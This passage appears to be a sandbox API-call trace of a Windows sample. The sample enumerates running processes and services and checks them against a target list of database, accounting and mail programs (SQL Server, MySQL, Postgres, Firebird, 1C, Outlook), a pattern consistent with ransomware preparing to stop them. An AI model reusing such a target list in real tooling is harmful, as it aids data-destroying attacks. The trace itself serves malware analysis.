	[0146.930] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0146.930] lstrlenW (lpString="wininit.exe") returned 11
	[0146.931] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0146.931] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0146.931] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0146.931] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0146.931] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0146.931] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0146.931] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0146.931] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0146.931] lstrlenW (lpString="csrss.exe") returned 9
	[0146.931] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0146.931] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0146.931] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0146.931] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0146.931] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0146.931] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0146.931] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0146.931] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0146.932] lstrlenW (lpString="winlogon.exe") returned 12
	[0146.932] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0146.932] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0146.932] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0146.932] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0146.932] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0146.932] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0146.932] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0146.932] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0146.932] lstrlenW (lpString="services.exe") returned 12
	[0146.932] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0146.932] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0146.932] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0146.932] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0146.932] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0146.932] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0146.932] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0146.932] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0146.933] lstrlenW (lpString="lsass.exe") returned 9
	[0146.933] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0146.933] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0146.933] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0146.933] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0146.933] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0146.933] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0146.933] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0146.933] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0146.933] lstrlenW (lpString="lsm.exe") returned 7
	[0146.933] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0146.933] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0146.933] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0146.933] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0146.933] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0146.933] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0146.933] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0146.933] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.934] lstrlenW (lpString="svchost.exe") returned 11
	[0146.934] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0146.934] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0146.934] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0146.934] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0146.934] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0146.934] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0146.934] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0146.934] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.934] lstrlenW (lpString="svchost.exe") returned 11
	[0146.934] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0146.934] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0146.934] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0146.934] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0146.934] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0146.934] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0146.934] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0146.935] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.935] lstrlenW (lpString="svchost.exe") returned 11
	[0146.935] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0146.935] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0146.935] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0146.935] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0146.935] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0146.935] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0146.935] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0146.935] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.935] lstrlenW (lpString="svchost.exe") returned 11
	[0146.935] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0146.935] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0146.935] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0146.935] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0146.935] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0146.935] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0146.936] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0146.936] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.936] lstrlenW (lpString="svchost.exe") returned 11
	[0146.936] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0146.936] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0146.936] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0146.936] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0146.936] lstrlenW (lpString="audiodg.exe") returned 11
	[0146.936] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.937] lstrlenW (lpString="svchost.exe") returned 11
	[0146.937] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.937] lstrlenW (lpString="svchost.exe") returned 11
	[0146.937] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0146.937] lstrlenW (lpString="spoolsv.exe") returned 11
	[0146.937] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.938] lstrlenW (lpString="svchost.exe") returned 11
	[0146.938] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0146.938] lstrlenW (lpString="taskhost.exe") returned 12
	[0146.938] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0146.938] lstrlenW (lpString="userinit.exe") returned 12
	[0146.938] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0146.939] lstrlenW (lpString="dwm.exe") returned 7
	[0146.939] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0146.939] lstrlenW (lpString="explorer.exe") returned 12
	[0146.939] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0146.939] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0146.939] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0146.940] lstrlenW (lpString="reader_sl.exe") returned 13
	[0146.940] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0146.940] CloseHandle (hObject=0x384) returned 1
	[0146.940] Sleep (dwMilliseconds=0x1f4) 
	[0147.590] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb617110
	[0147.601] EnumServicesStatusExW (in: hSCManager=0xb617110, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0147.602] GetLastError () returned 0xea
	[0147.602] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0147.602] EnumServicesStatusExW (in: hSCManager=0xb617110, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0147.602] CloseServiceHandle (hSCObject=0xb617110) returned 1
	[0147.603] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0147.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0147.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0147.603] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0147.603] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0147.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0147.603] lstrlenW (lpString="AudioSrv") returned 8
	[0147.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0147.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0147.603] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0147.603] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0147.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0147.603] lstrlenW (lpString="BFE") returned 3
	[0147.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0147.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0147.603] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0147.603] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0147.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0147.603] lstrlenW (lpString="CryptSvc") returned 8
	[0147.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0147.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0147.603] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0147.603] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0147.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0147.603] lstrlenW (lpString="CscService") returned 10
	[0147.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0147.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0147.604] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0147.604] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0147.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0147.604] lstrlenW (lpString="DcomLaunch") returned 10
	[0147.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0147.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0147.604] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0147.604] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0147.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0147.604] lstrlenW (lpString="Dhcp") returned 4
	[0147.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0147.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0147.604] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0147.604] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0147.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0147.604] lstrlenW (lpString="Dnscache") returned 8
	[0147.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0147.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0147.604] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0147.604] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0147.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0147.604] lstrlenW (lpString="DPS") returned 3
	[0147.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0147.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0147.604] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0147.604] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0147.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0147.604] lstrlenW (lpString="eventlog") returned 8
	[0147.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0147.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0147.604] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0147.605] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0147.605] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0147.605] lstrlenW (lpString="EventSystem") returned 11
	[0147.605] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0147.605] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0147.605] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0147.605] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0147.605] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0147.605] lstrlenW (lpString="gpsvc") returned 5
	[0147.605] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0147.605] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0147.605] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0147.605] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0147.605] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0147.605] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0147.605] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0147.605] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0147.605] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0147.605] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0147.605] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0147.605] lstrlenW (lpString="lmhosts") returned 7
	[0147.605] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0147.605] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0147.605] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0147.605] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0147.605] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0147.605] lstrlenW (lpString="MMCSS") returned 5
	[0147.605] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0147.605] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0147.605] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0147.606] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0147.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0147.606] lstrlenW (lpString="MpsSvc") returned 6
	[0147.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0147.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0147.606] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0147.606] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0147.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0147.606] lstrlenW (lpString="NlaSvc") returned 6
	[0147.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0147.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0147.606] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0147.606] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0147.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0147.606] lstrlenW (lpString="nsi") returned 3
	[0147.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0147.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0147.606] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0147.606] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0147.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0147.606] lstrlenW (lpString="PcaSvc") returned 6
	[0147.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0147.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0147.606] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0147.606] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0147.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0147.606] lstrlenW (lpString="PlugPlay") returned 8
	[0147.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0147.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0147.606] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0147.606] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0147.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0147.607] lstrlenW (lpString="Power") returned 5
	[0147.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0147.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0147.607] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0147.607] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0147.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0147.607] lstrlenW (lpString="ProfSvc") returned 7
	[0147.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0147.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0147.607] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0147.607] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0147.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0147.607] lstrlenW (lpString="RpcEptMapper") returned 12
	[0147.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0147.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
